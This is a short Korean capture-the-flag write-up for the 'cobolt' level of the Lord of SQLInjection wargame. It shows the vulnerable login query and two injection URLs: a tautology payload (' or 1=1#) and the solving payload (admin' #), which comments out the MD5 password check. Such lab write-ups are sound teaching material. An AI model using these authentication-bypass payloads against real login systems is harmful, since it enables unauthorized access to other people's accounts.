LOS cobolt writeup

LOS cobolt writeup

우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다. 

http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234

.위와 같이 

query : select id from prob_cobolt where id='admin' and pw=md5('1234')

이렇게 나오고 1번문제 푼것과 같이 넣어보면, 

http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw=

이렇게 나온다...음... 이 방법은 아닌가보다. 

  if($result['id'] == 'admin') solve("cobolt");

  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"; 
  highlight_file(__FILE__); 

전과 같은 방법을 쓰니 admin이 아니라 id가 rubiya님이 뜨는것을 확인할 수 있다. 흠 그럼 admin으로 로그인을 해야 된다는건데...

그래서 admin을 넣고 뒤에는 주석처리를 해주었다.

http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%20%23

이렇게 하니 성공!!